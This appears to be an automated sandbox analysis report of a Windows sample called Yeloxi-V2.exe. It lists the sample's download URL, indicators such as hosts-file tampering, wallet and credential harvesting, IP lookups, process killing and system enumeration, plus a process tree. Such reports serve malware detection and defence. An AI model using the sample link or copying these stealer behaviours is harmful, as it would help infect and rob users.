Analysis
-
max time kernel
123s -
max time network
127s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-04-2024 14:22
Static task
static1
URLScan task
urlscan1
Malware Config
Signatures
-
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeYeloxi-V2.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Yeloxi-V2.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 232 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Yeloxi-V2.exepid process 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe 608 Yeloxi-V2.exe -
Processes:
resource yara_rule behavioral1/memory/608-627-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\python311.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI40642\libcrypto-3.dll upx behavioral1/memory/608-650-0x00007FFCFD5C0000-0x00007FFCFD5CF000-memory.dmp upx behavioral1/memory/608-649-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp upx behavioral1/memory/608-662-0x00007FFCF96E0000-0x00007FFCF970D000-memory.dmp upx behavioral1/memory/608-666-0x00007FFCE5000000-0x00007FFCE5023000-memory.dmp upx behavioral1/memory/608-665-0x00007FFCF95E0000-0x00007FFCF95F9000-memory.dmp upx behavioral1/memory/608-668-0x00007FFCE4E80000-0x00007FFCE4FF7000-memory.dmp upx behavioral1/memory/608-674-0x00007FFCE4E40000-0x00007FFCE4E73000-memory.dmp upx behavioral1/memory/608-677-0x00007FFCE4D70000-0x00007FFCE4E3D000-memory.dmp upx behavioral1/memory/608-673-0x00007FFCFD300000-0x00007FFCFD30D000-memory.dmp upx behavioral1/memory/608-678-0x00007FFCE4840000-0x00007FFCE4D62000-memory.dmp upx behavioral1/memory/608-672-0x00007FFCF8F50000-0x00007FFCF8F69000-memory.dmp upx behavioral1/memory/608-682-0x00007FFCE4720000-0x00007FFCE483C000-memory.dmp upx behavioral1/memory/608-681-0x00007FFCF83B0000-0x00007FFCF83C4000-memory.dmp upx behavioral1/memory/608-680-0x00007FFCFD1E0000-0x00007FFCFD1ED000-memory.dmp upx behavioral1/memory/608-882-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp upx behavioral1/memory/608-894-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp upx behavioral1/memory/608-913-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp upx behavioral1/memory/608-918-0x00007FFCE5000000-0x00007FFCE5023000-memory.dmp upx behavioral1/memory/608-924-0x00007FFCE4840000-0x00007FFCE4D62000-memory.dmp upx behavioral1/memory/608-923-0x00007FFCE4D70000-0x00007FFCE4E3D000-memory.dmp upx behavioral1/memory/608-922-0x00007FFCE4E40000-0x00007FFCE4E73000-memory.dmp upx behavioral1/memory/608-920-0x00007FFCF8F50000-0x00007FFCF8F69000-memory.dmp upx behavioral1/memory/608-919-0x00007FFCE4E80000-0x00007FFCE4FF7000-memory.dmp upx behavioral1/memory/608-929-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp upx behavioral1/memory/608-943-0x00007FFCE4720000-0x00007FFCE483C000-memory.dmp upx behavioral1/memory/608-953-0x00007FFCE4D70000-0x00007FFCE4E3D000-memory.dmp upx behavioral1/memory/608-952-0x00007FFCE4E40000-0x00007FFCE4E73000-memory.dmp upx behavioral1/memory/608-951-0x00007FFCFD300000-0x00007FFCFD30D000-memory.dmp upx behavioral1/memory/608-950-0x00007FFCF8F50000-0x00007FFCF8F69000-memory.dmp upx behavioral1/memory/608-949-0x00007FFCE4E80000-0x00007FFCE4FF7000-memory.dmp upx behavioral1/memory/608-948-0x00007FFCE5000000-0x00007FFCE5023000-memory.dmp upx behavioral1/memory/608-947-0x00007FFCF95E0000-0x00007FFCF95F9000-memory.dmp upx behavioral1/memory/608-946-0x00007FFCF96E0000-0x00007FFCF970D000-memory.dmp upx behavioral1/memory/608-945-0x00007FFCFD5C0000-0x00007FFCFD5CF000-memory.dmp upx behavioral1/memory/608-944-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp upx behavioral1/memory/608-940-0x00007FFCE4840000-0x00007FFCE4D62000-memory.dmp upx behavioral1/memory/608-942-0x00007FFCFD1E0000-0x00007FFCFD1ED000-memory.dmp upx behavioral1/memory/608-941-0x00007FFCF83B0000-0x00007FFCF83C4000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 205 ip-api.com 230 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 5320 WMIC.exe 5516 WMIC.exe 2132 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 5296 tasklist.exe 5968 tasklist.exe 5032 tasklist.exe 5488 tasklist.exe 5552 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 38 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5032 taskkill.exe 700 taskkill.exe 5848 taskkill.exe 6084 taskkill.exe 2248 taskkill.exe 2132 taskkill.exe 1492 taskkill.exe 4768 taskkill.exe 3644 taskkill.exe 5708 taskkill.exe 4968 taskkill.exe 2972 taskkill.exe 5504 taskkill.exe 676 taskkill.exe 572 taskkill.exe 4124 taskkill.exe 5028 taskkill.exe 3392 taskkill.exe 4264 taskkill.exe 676 taskkill.exe 5704 taskkill.exe 1492 taskkill.exe 5504 taskkill.exe 5948 taskkill.exe 2388 taskkill.exe 2200 taskkill.exe 928 taskkill.exe 3464 taskkill.exe 5692 taskkill.exe 1992 taskkill.exe 4688 taskkill.exe 4908 taskkill.exe 6052 taskkill.exe 3904 taskkill.exe 4912 taskkill.exe 2916 taskkill.exe 276 taskkill.exe 1520 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Yeloxi-V2.zip:Zone.Identifier msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1636 msedge.exe 1636 msedge.exe 3860 msedge.exe 3860 msedge.exe 1312 identity_helper.exe 1312 identity_helper.exe 5532 msedge.exe 5532 msedge.exe 5424 msedge.exe 5424 msedge.exe 3644 powershell.exe 3644 powershell.exe 5344 powershell.exe 5344 powershell.exe 5344 powershell.exe 3644 powershell.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 700 powershell.exe 700 powershell.exe 700 powershell.exe 5412 powershell.exe 5412 powershell.exe 5412 powershell.exe 3604 powershell.exe 3604 powershell.exe 2264 powershell.exe 2264 powershell.exe 772 powershell.exe 772 powershell.exe 5772 powershell.exe 5772 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
Processes:
msedge.exepid process 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AUDIODG.EXEWMIC.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: 33 4748 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4748 AUDIODG.EXE Token: SeIncreaseQuotaPrivilege 6096 WMIC.exe Token: SeSecurityPrivilege 6096 WMIC.exe Token: SeTakeOwnershipPrivilege 6096 WMIC.exe Token: SeLoadDriverPrivilege 6096 WMIC.exe Token: SeSystemProfilePrivilege 6096 WMIC.exe Token: SeSystemtimePrivilege 6096 WMIC.exe Token: SeProfSingleProcessPrivilege 6096 WMIC.exe Token: SeIncBasePriorityPrivilege 6096 WMIC.exe Token: SeCreatePagefilePrivilege 6096 WMIC.exe Token: SeBackupPrivilege 6096 WMIC.exe Token: SeRestorePrivilege 6096 WMIC.exe Token: SeShutdownPrivilege 6096 WMIC.exe Token: SeDebugPrivilege 6096 WMIC.exe Token: SeSystemEnvironmentPrivilege 6096 WMIC.exe Token: SeRemoteShutdownPrivilege 6096 WMIC.exe Token: SeUndockPrivilege 6096 WMIC.exe Token: SeManageVolumePrivilege 6096 WMIC.exe Token: 33 6096 WMIC.exe Token: 34 6096 WMIC.exe Token: 35 6096 WMIC.exe Token: 36 6096 WMIC.exe Token: SeDebugPrivilege 5296 tasklist.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 6096 WMIC.exe Token: SeSecurityPrivilege 6096 WMIC.exe Token: SeTakeOwnershipPrivilege 6096 WMIC.exe Token: SeLoadDriverPrivilege 6096 WMIC.exe Token: SeSystemProfilePrivilege 6096 WMIC.exe Token: SeSystemtimePrivilege 6096 WMIC.exe Token: SeProfSingleProcessPrivilege 6096 WMIC.exe Token: SeIncBasePriorityPrivilege 6096 WMIC.exe Token: SeCreatePagefilePrivilege 6096 WMIC.exe Token: SeBackupPrivilege 6096 WMIC.exe Token: SeRestorePrivilege 6096 WMIC.exe Token: SeShutdownPrivilege 6096 WMIC.exe Token: SeDebugPrivilege 6096 WMIC.exe Token: SeSystemEnvironmentPrivilege 6096 WMIC.exe Token: SeRemoteShutdownPrivilege 6096 WMIC.exe Token: SeUndockPrivilege 6096 WMIC.exe Token: SeManageVolumePrivilege 6096 WMIC.exe Token: 33 6096 WMIC.exe Token: 34 6096 WMIC.exe Token: 35 6096 WMIC.exe Token: 36 6096 WMIC.exe Token: SeDebugPrivilege 5344 powershell.exe Token: SeIncreaseQuotaPrivilege 5320 WMIC.exe Token: SeSecurityPrivilege 5320 WMIC.exe Token: SeTakeOwnershipPrivilege 5320 WMIC.exe Token: SeLoadDriverPrivilege 5320 WMIC.exe Token: SeSystemProfilePrivilege 5320 WMIC.exe Token: SeSystemtimePrivilege 5320 WMIC.exe Token: SeProfSingleProcessPrivilege 5320 WMIC.exe Token: SeIncBasePriorityPrivilege 5320 WMIC.exe Token: SeCreatePagefilePrivilege 5320 WMIC.exe Token: SeBackupPrivilege 5320 WMIC.exe Token: SeRestorePrivilege 5320 WMIC.exe Token: SeShutdownPrivilege 5320 WMIC.exe Token: SeDebugPrivilege 5320 WMIC.exe Token: SeSystemEnvironmentPrivilege 5320 WMIC.exe Token: SeRemoteShutdownPrivilege 5320 WMIC.exe Token: SeUndockPrivilege 5320 WMIC.exe Token: SeManageVolumePrivilege 5320 WMIC.exe -
Suspicious use of FindShellTrayWindow 62 IoCs
Processes:
msedge.exepid process 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3860 wrote to memory of 232 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 232 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1800 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1636 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 1636 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe PID 3860 wrote to memory of 784 3860 msedge.exe msedge.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 5544 attrib.exe 2964 attrib.exe 2584 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://fastupload.io/en/qrTsYtdAHwxx9JI/file1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcfa333cb8,0x7ffcfa333cc8,0x7ffcfa333cd82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3376 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:12⤵
-
